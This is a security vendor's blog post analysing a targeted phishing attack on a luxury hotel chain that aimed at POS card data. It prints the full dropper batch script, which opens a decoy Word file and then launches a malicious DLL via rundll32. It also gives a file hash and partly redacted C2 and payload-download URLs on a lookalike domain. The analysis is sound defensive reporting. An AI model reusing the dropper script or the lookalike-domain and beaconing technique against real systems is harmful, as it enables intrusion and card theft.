Targeted attacks on hotel chains: a practical example

Recently, a report was published, which reported on numerous cyber attacks on large hotel chains. The attacks were mainly aimed at stealing customer bank card data. To do this, hackers infected POS-terminals in hotels. A few days ago, one of the clients of Panda Security, a user of Adaptive Defense 360 , a luxury hotel chain, was attacked. We took this opportunity to show how cyber criminals are trying to penetrate corporate networks.

In most cases, these types of attacks are launched via e-mail using an attached file that compromises the victim’s computer, or links to a page that uses vulnerabilities to achieve the criminal’s goal. In the case of our client, the attack began with a mail message addressed to the hotel employee, with the information that the attached file contains all the information necessary to pay for accommodation at the hotel at the end of May 2016.
')
The message contained an attachment in the form of an archived file, which, when opened, contained a file with a Microsoft Word icon. When the file was launched, it showed the following:



This is a hotel reservation form, filled with a potential client of the hotel. Here is information on payment for accommodation at the end of May 2016. As you can see, there is nothing unusual here. In fact, this document is identical to what this hotel employee sends to his clients (even the name is similar), but if we look carefully, we can see that the file came in a zip archive. Although the Word icon is shown, we are dealing with an executable file.

When you run this file, three files are created on the disk, the first of which starts:

- reader_sl.cmd
- ROCA.ING.docx
- adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

@echo off
start “” ROCA.ING.docx
Set xOS = x64
If “% PROCESSOR_ARCHITECTURE%” == ”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS = x86
IF “% xOS%” == “x64” (start “” C: \ Windows \ SysWOW64 \ rundll32.exe adobeUpd.dll, Wenk)
IF “% xOS%” == “x86” (start “” C: \ Windows \ System32 \ rundll32.exe adobeUpd.dll, Wenk)
ping -n 12 localhost

As you can see, the first thing that happens is the Word document, which allows you to fool the victim. Then run adobeUpd.dll with the “Wenk” parameter. At runtime, this file is modified and marked as hidden and read-only, and an entry is created in the Windows registry that is started every time the computer turns on.

Then a link to a specific URL is made:
www . ************. ga / en / scripts / en.php? stream = lcc & user = iPmbzfAIRMFw

As a result, a file is downloaded that contains the user data for this URL parameter (iPmbzfAIRMFw). In the case of a match, an attempt is made to download the file:

www . ************. ga / en / scripts / iPmbzfAIRMFw.jpg

When we tried to download this file, it was unavailable: it did not get into our client’s system, because An infection attempt was blocked, and the malicious program failed to start there. The URL domain is exactly the same as our client’s domain, but only the client has a domain in the “.com” zone, and hackers registered a domain with the exact same name, but only in Gabon (“.ga”). Thus, the similarity of the domain name does not attract attention if the security service of the hotel analyzes the network traffic.

Despite the fact that the iPmbzfAIRMFw.jpg file was unavailable, if we look at the adobeUpd.dll code, we can see that in fact in this file a certain code is being searched for, and then it encrypts the data from it and runs it as PE (created as “Temp \ systm”).

Later, adobeUpd.dll stays in a loop, randomly connecting to the following URL every few minutes:
www . ************. ga / en / scripts / en.php? mode = OPR & uid = iPmbzfAIRMFw & type = YFm

As we see, this attack was specifically targeted at this hotel chain . The criminals have already removed all traces of the server, where the client could connect to the malware, and since we interrupted the attack, now we can only guess what they were going to do next. Based on our experience, this type of attack is aimed at infecting the remaining users of the network of the victim company in order to subsequently reach the goal: POS-terminals that process payments made with bank cards, which we could observe in many other cases.

Traditional antivirus does not work against this type of attack, because they are created specifically for a specific victim, while hackers are confident that their malware is not detected by signatures, proactive technologies and other protection modules of the security solutions used by the victim. That is why it is extremely important to have an EDR-type of services ( Endpoint Detection & Response ) in combination with advanced protection technologies to provide effective protection against such targeted attacks.